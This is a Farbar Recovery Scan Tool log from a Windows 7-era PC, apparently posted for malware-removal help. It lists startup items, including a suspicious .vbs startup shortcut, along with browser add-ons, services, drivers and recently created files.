C:\Users\Victoria\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.lnkShortcutTarget: start.lnk -> C:\Users\Victoria\31ifp7kidvc849\ozds.vbs ()BootExecute: autocheck autochk * sdnclean64.exe ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/USCON/1URLSearchHook: HKCU - YTNavAssistPlugin Class - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\yt.dll (Yahoo! Inc.)SearchScopes: HKLM-x32 - Backup.Old.DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990}SearchScopes: HKCU - Backup.Old.DefaultScope {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}SearchScopes: HKCU - {3B240033-DC49-4933-8B91-D9D2EA8C3D99} URL = SearchScopes: HKCU - {7D96684E-D63B-4FA3-B32B-07F83D4CCE67} URL = http://search.yahoo.com/search?p={searchterms}&ei=UTF-8&fr=w3i&type=W3i_DS,136,0_0,Search,20120415,17118,0,18,0SearchScopes: HKCU - {CC7EA43B-A8BD-43C4-AFDB-260AD0A8FD6E} URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=599486&p={searchTerms}BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll (RealDownloader)BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)BHO: FreePriceAlerts -> {A7C0A55C-300E-4193-8FB5-5DB8E6533D35} -> C:\Program Files (x86)\FreePriceAlerts\win64\vbobho.dll No FileBHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.130\McAfeeMSS_IE.dll (McAfee, Inc.)BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)BHO-x32: Ad Nuker -> {459CAF0F-CA9F-4d69-A1A9-B0699D07AB8A} -> C:\Windows\SysWow64\NukerBand.dll ()BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)BHO-x32: Skype add-on for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)BHO-x32: SpeedBit Link Verification Helper -> {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} -> C:\Program Files (x86)\DAP\LinkVerifier.dll (Speedbit Ltd.)BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)Toolbar: HKLM-x32 - Ad Nuker - {459CAF0F-CA9F-4d69-A1A9-B0699D07AB8A} - C:\Windows\SysWow64\NukerBand.dll ()Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No FileToolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)DPF: HKLM-x32 {233C1507-6A77-46A4-9443-F871F945D258} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cabDPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cabDPF: HKLM-x32 {E6F480FC-BD44-4CBA-B74A-89AF7842937D} http://content.systemrequirementslab.com.s3.amazonaws.com/global/bin/srldetect_cyri_4.4.26.0.cabHandler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - No FileHandler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txtTcpip\Parameters: [DhcpNameServer] 192.168.1.1 FireFox:========FF ProfilePath: C:\Users\Victoria\AppData\Roaming\Mozilla\Firefox\Profiles\pslr2j3b.defaultFF DefaultSearchEngine: Yahoo!FF SelectedSearchEngine: Yahoo!FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_170.dll ()FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)FF Plugin: @microsoft.com/GENUINE -> disabled No FileFF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll ()FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1202122.dll (Adobe Systems, Inc.)FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)FF Plugin-x32: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)FF Plugin-x32: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)FF Plugin-x32: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.130\npMcAfeeMss.dll (McAfee, Inc.)FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)FF Plugin-x32: @microsoft.com/GENUINE -> disabled No FileFF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)FF Plugin-x32: @real.com/nppl3260;version=17.0.11.0 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=17.0.11 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.11 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=17.0.11 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)FF Plugin-x32: @real.com/nprpplugin;version=17.0.11.0 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll (RealPlayer Cloud)FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)FF Plugin-x32: @videolan.org/vlc,version=2.1.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\6\NP_wtapp.dll ()FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)FF SearchPlugin: C:\Users\Victoria\AppData\Roaming\Mozilla\Firefox\Profiles\pslr2j3b.default\searchplugins\yahoo_ff.xmlFF Extension: ClipConverter Desktop - C:\Users\Victoria\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\desktop@clipconverter.cc.xpi [2013-10-20]FF Extension: Ziftr Alerts - formerly FreePriceAlerts.com - C:\Users\Victoria\AppData\Roaming\Mozilla\Firefox\Profiles\pslr2j3b.default\Extensions\extension@freepricealerts.com [2013-06-01]FF Extension: SaveSense - C:\Users\Victoria\AppData\Roaming\Mozilla\Firefox\Profiles\pslr2j3b.default\Extensions\{2fab2e94-d6f9-42de-8839-3510cef6424b} [2014-02-03]FF Extension: DownTango Launcher - C:\Users\Victoria\AppData\Roaming\Mozilla\Firefox\Profiles\pslr2j3b.default\Extensions\{411beae9-8c58-477c-8903-201536f61512} [2012-12-01]FF Extension: Universal Downloader - C:\Users\Victoria\AppData\Roaming\Mozilla\Firefox\Profiles\pslr2j3b.default\Extensions\{9051303c-7e41-4311-a783-d6fe5ef2832d}.xpi [2013-04-04]FF Extension: Adblock Plus - C:\Users\Victoria\AppData\Roaming\Mozilla\Firefox\Profiles\pslr2j3b.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2012-12-20]FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla ThunderbirdFF HKLM-x32\...\Firefox\Extensions: [daplinkchecker@speedbit.com] - C:\Program Files (x86)\DAP\daplinkcheckerFF Extension: DAP Link Checker - C:\Program Files (x86)\DAP\daplinkchecker [2012-07-22]FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\ExtFF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-06-30]FF HKLM-x32\...\Firefox\Extensions: [{1DD9AC48-0855-4AE7-9934-159B4377FFA2}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\ExtFF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla ThunderbirdFF HKCU\...\Firefox\Extensions: [{F17C1572-C9EC-4e5c-A542-D05CBB5C5A08}] - C:\Program Files (x86)\DAP\DAPFireFoxFF Extension: Download Accelerator Plus (DAP) extension - C:\Program Files (x86)\DAP\DAPFireFox [2012-07-22] Chrome: =======CHR HomePage: Default -> CHR DefaultSearchKeyword: Default -> AF95F7E612630FA95B465DC5ACD3D91476418306986A906DF7DECEFA9F0F19F4CHR DefaultSearchURL: Default -> 33E9012285D7C5E5480B8D3AB8D6AD2BE038570B16B498E5E25BE1A7B9B6E202CHR Profile: C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\DefaultCHR Extension: (Google Docs) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-01-03]CHR Extension: (Google Drive) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-01-03]CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-22]CHR Extension: (YouTube) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-01-03]CHR Extension: (DAP Link Checker) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Default\Extensions\bodfdknjhecmadheclfjkhhiofeagdbh [2013-08-13]CHR Extension: (Adblock Plus) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2013-08-13]CHR Extension: (Google Search) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-01-03]CHR Extension: (Video Downloader professional) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Default\Extensions\elicpjhcidhpjomhibiffojpinpmmpil [2014-01-03]CHR Extension: (Download Accelerator Plus (DAP)) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffdcfjdljhbehggjdkdioajnknjcpbjb [2013-08-13]CHR Extension: (RealPlayer Downloader) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Default\Extensions\idhngdhcfkoamngbedgpaokgjbnpdiji [2014-04-25]CHR Extension: (FVD Downloader) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Default\Extensions\lfmhcpmkbdkbgbmkjoiopeeegenkdikp [2014-07-06]CHR Extension: (Google Wallet) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-23]CHR Extension: (Gmail) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-01-03]CHR Profile: C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Profile 3CHR Extension: (No Name) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\dlnembnfbcpjnepmfjmngjenhhajpdfd [2012-12-08]CHR Extension: (No Name) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ffdcfjdljhbehggjdkdioajnknjcpbjb [2012-07-22]CHR Extension: (No Name) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\jifflliplgeajjdhmkcfnngfpgbjonjg [2012-12-08]CHR Extension: (No Name) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\jpmbfleldcgkldadpdinhjjopdfpjfjp [2013-02-02]CHR Extension: (No Name) - C:\Users\Victoria\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ngifmmghggmgbhdohdfjpaklhflocdad [2013-01-02]CHR HKLM\...\Chrome\Extension: [geggofhlfbcmanadhknllmlajiafopoh] - C:\Program Files\PrivacySafeGuard\pschrome_adk-c1_1_0.crx [2012-04-11]CHR HKLM-x32\...\Chrome\Extension: [bodfdknjhecmadheclfjkhhiofeagdbh] - C:\Program Files (x86)\DAP\daplinkchecker.crx [2012-07-22]CHR HKLM-x32\...\Chrome\Extension: [ffdcfjdljhbehggjdkdioajnknjcpbjb] - C:\Program Files (x86)\DAP\DAPChrome\DAPChrome6.crx [2012-07-22]CHR HKLM-x32\...\Chrome\Extension: [gladcbhcbkdeddbidiblppadjdjalidb] - C:\Program Files (x86)\DownTangoFTToolbar\chrome\DownTangoFTToolbar.crx [2012-07-22]CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2014-06-10] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [140672 2012-10-11] (SUPERAntiSpyware.com) [File not signed]R2 AdobeActiveFileMonitor12.0; C:\Program Files (x86)\Adobe\Elements 12 Organizer\PhotoshopElementsFileAgent.exe [181152 2013-09-25] (Adobe Systems Incorporated)S3 BRSptSvc; C:\programdata\bitraider\BRSptSvc.exe [938776 2013-05-18] (BitRaider, LLC)S2 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [393032 2013-07-04] (BlueStack Systems, Inc.)R2 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [384840 2013-07-04] (BlueStack Systems, Inc.)R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [155648 2009-06-09] (Stardock Corporation) [File not signed]S3 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [227904 2014-04-24] (WildTangent)S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]R2 lxdd_device; C:\Windows\system32\lxddcoms.exe [567216 2007-05-25] ( )R2 lxdd_device; C:\Windows\SysWOW64\lxddcoms.exe [537520 2007-05-25] ( )R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.130\McCHSvc.exe [288776 2013-09-06] (McAfee, Inc.)R2 mfevtp; C:\Windows\system32\mfevtps.exe [158832 2011-03-13] (McAfee, Inc.)S3 MSCSPTISRV; C:\Program Files (x86)\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe [45056 2006-12-14] (Sony Corporation) [File not signed]S3 OpenVPNService; C:\Program Files (x86)\OpenVPN\bin\openvpnserv.exe [32568 2014-05-02] (The OpenVPN Project)S3 PACSPTISVR; C:\Program Files (x86)\Common Files\Sony Shared\AVLib\PACSPTISVR.exe [57344 2006-12-14] () [File not signed]R2 RapportMgmtService; C:\Program Files (x86)\Trusteer\Rapport\bin\RapportMgmtService.exe [1919256 2014-07-31] (IBM Corp.)R2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-06-10] ()R2 RealPlayer Cloud Service; c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [1141848 2014-06-30] (RealNetworks, Inc.)R2 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [23552 2014-06-10] () [File not signed]R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)S3 SonicStage Back-End Service; C:\Program Files (x86)\Common Files\Sony Shared\AVLib\SsBeSvc.exe [112184 2007-02-05] (Sony Corporation)S3 SPTISRV; C:\Program Files (x86)\Common Files\Sony Shared\AVLib\SPTISRV.exe [69632 2006-12-14] (Sony Corporation) [File not signed]S3 SSScsiSV; C:\Program Files (x86)\Common Files\Sony Shared\AVLib\SSScsiSV.exe [75320 2007-02-05] (Sony Corporation)R2 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [77824 2012-04-22] (Atheros) [File not signed]S2 vToolbarUpdater18.1.9; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [X] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) S2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [312480 2013-03-24] ()R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-08-11] (AVG Technologies)S3 BRDriver64; C:\programdata\bitraider\BRDriver64.sys [74024 2013-04-25] (BitRaider)R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [70984 2013-07-04] (BlueStack Systems)R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [271424 2011-10-15] (DT Soft Ltd)S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [32512 2014-09-15] ()R2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [43168 2013-03-24] ()R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation)U4 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [122584 2014-09-15] (Malwarebytes Corporation)R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-05-12] (Malwarebytes Corporation)S3 mfeapfk; C:\Windows\System32\drivers\mfeapfk.sys [156792 2011-03-13] (McAfee, Inc.)R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [639216 2011-03-13] (McAfee, Inc.)S3 NPF; C:\Windows\SysWOW64\drivers\npf.sys [32512 2005-08-02] (CACE Technologies) [File not signed]R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2013-07-19] (Corel Corporation)R1 RapportCerberus_80049; C:\ProgramData\Trusteer\Rapport\store\exts\RapportCerberus\baseline\RapportCerberus64_80049.sys [768184 2014-09-02] ()R1 RapportEI64; C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportEI64.sys [444184 2014-07-31] (IBM Corp.)R0 RapportKE64; C:\Windows\System32\Drivers\RapportKE64.sys [536984 2014-07-31] (IBM Corp.)R1 RapportPG64; C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportPG64.sys [562136 2014-07-31] (IBM Corp.)R3 RTL8187; C:\Windows\System32\DRIVERS\wg111v2.sys [450048 2010-04-06] (NETGEAR Inc.)R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)S3 Serial; C:\Windows\system32\DRIVERS\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [34544 2013-08-11] (Synaptics Incorporated)S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [16152 2014-09-09] ()S3 taphss6; C:\Windows\System32\DRIVERS\taphss6.sys [42184 2014-03-19] (Anchorfree Inc.)R3 tapSF0901; C:\Windows\System32\DRIVERS\tapSF0901.sys [39104 2013-05-28] (Spotflux, Inc.)U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()S3 HWiNFO32; \??\C:\Users\Victoria\AppData\Local\Temp\HWiNFO64A.SYS [X]S3 RTHDMIAzAudService; system32\drivers\RtHDMIVX.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-15 21:37 - 2014-09-15 21:37 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage2014-09-15 20:47 - 2014-09-15 20:47 - 02105856 _____ (Farbar) C:\Users\Victoria\Downloads\FRST64 (2).exe2014-09-15 20:38 - 2014-09-15 21:49 - 00000000 ____D () C:\Users\Victoria\Desktop\New folder (7)2014-09-15 20:36 - 2014-09-15 20:36 - 02105856 _____ (Farbar) C:\Users\Victoria\Downloads\FRST64 (1).exe2014-09-15 20:18 - 2014-09-15 20:18 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking2014-09-15 20:17 - 2014-09-15 20:22 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy2014-09-15 20:17 - 2014-09-15 20:20 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 22014-09-15 20:17 - 2014-09-15 20:17 - 00001357 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk2014-09-15 20:17 - 2014-09-15 20:17 - 00001345 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk2014-09-15 20:17 - 2014-09-15 20:17 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 22014-09-15 20:17 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe2014-09-15 20:14 - 2014-09-15 20:16 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Victoria\Downloads\spybot-2.4.exe2014-09-15 20:03 - 2014-09-15 21:32 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2014-09-15 20:03 - 2014-09-15 20:03 - 00001068 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-09-15 20:03 - 2014-09-15 20:03 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware2014-09-15 20:03 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys2014-09-15 20:03 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys2014-09-15 20:03 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys2014-09-15 20:02 - 2014-09-15 20:03 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware2014-09-15 20:00 - 2014-09-15 20:02 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Victoria\Downloads\mbam-setup-2.0.2.1012 (3).exe2014-09-15 19:58 - 2014-09-15 19:58 - 00003246 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-2698232268-2154043033-3228781758-10002014-09-15 19:57 - 2014-09-15 19:57 - 00003374 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-2698232268-2154043033-3228781758-10002014-09-15 19:45 - 2014-09-15 20:37 - 00083374 _____ () C:\Users\Victoria\Downloads\FRST.txt2014-09-15 19:44 - 2014-09-15 21:49 - 00000000 ____D () C:\FRST2014-09-15 19:43 - 2014-09-15 19:44 - 02105856 _____ (Farbar) C:\Users\Victoria\Downloads\FRST64.exe2014-09-15 19:06 - 2014-09-15 19:06 - 00000000 ____D () 